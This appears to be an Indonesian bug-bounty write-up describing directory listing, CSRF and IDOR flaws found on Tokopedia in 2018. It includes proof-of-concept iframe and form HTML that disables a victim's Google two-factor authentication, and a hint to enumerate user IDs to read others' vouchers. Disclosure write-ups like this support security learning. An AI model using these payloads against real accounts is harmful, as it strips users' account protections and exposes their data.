Perburuan bug bounty ku di Tokopedia #1

Share:




Pada tanggal 12 Desember 2018 saya menemukan 3 bug secara bersamaan.
bug yang saya temukan : 
  1. Dirlisting 
  2. Cross-site Request Forgery in Critical Action 
  3. IDOR
Yuk kita bahas satu-satu ,

Dirlisting 

Bug yang saya temukan ini tidak beresiko karena tidak ada informasi yang senstif cuman bisa lihat assets .html / .js / .css. bug ini sangat tinggi bila bisa sampe ketemu database atau data sensitif lain nya. 





Cross-site Request Forgery in Critical Action 

Bug ini mungkin High karena saya temukan di fitur Google Auth milik tokopedia , dimana saya dapat menon-aktifkan fitur tersebut bila fitur tersebut di aktifkan oleh penguna. 
Sekenario : Attacker membuat sebuah iframe pada situs pribadinya , dengan source code :

<iframe src="”https://accounts.tokopedia.com/otp/auth/google?user=&amp;lang=&amp;page=deactivate&amp;go=Kirim"></iframe>

atau attacker membuat sebuah html dengan metode post data :

<form action="”https://accounts.tokopedia.com/otp/auth/google" method="”POST”">
<input name="”user”value=””" />

<input type="”lang”" value="””" />

<input name="”page”" type="”hidden”" value="”deactivate”" />

<input disini="" mendapatkan="" name="”go”" reward="" type="”submit”" untuk="" value="”Klik" />

</form>




Dan bug terakhir , yaitu IDOR : 

Ada banyak variabel dalam aplikasi seperti “id”, “pid”, “uid”. Meskipun nilai-nilai ini sering dilihat sebagai parameter HTTP, nilai ini dapat ditemukan di header dan cookie. Penyerang dapat mengakses, mengedit, atau menghapus objek pengguna lain dengan mengubah nilainya. Kerentanan ini disebut IDOR.
yang saya dapatkan di tokopedia , bug IDOR pada coupon_list di rest api.
jadi saya dapat melihat informasi vocer kode milik orang (wowwwww) 
Untuk cara kerjanya : 


7082382 dan 44407494 merupakan user_id penguna tokopedia. tinggal kalian cari saja dengan teknik ‘enumeration




Catatan : 
Segala screen shot maupun kode-kode yang mengarah ke akun tokopedia merupakan akun pribadi saya , bukan akun orang lain. 


1 comment: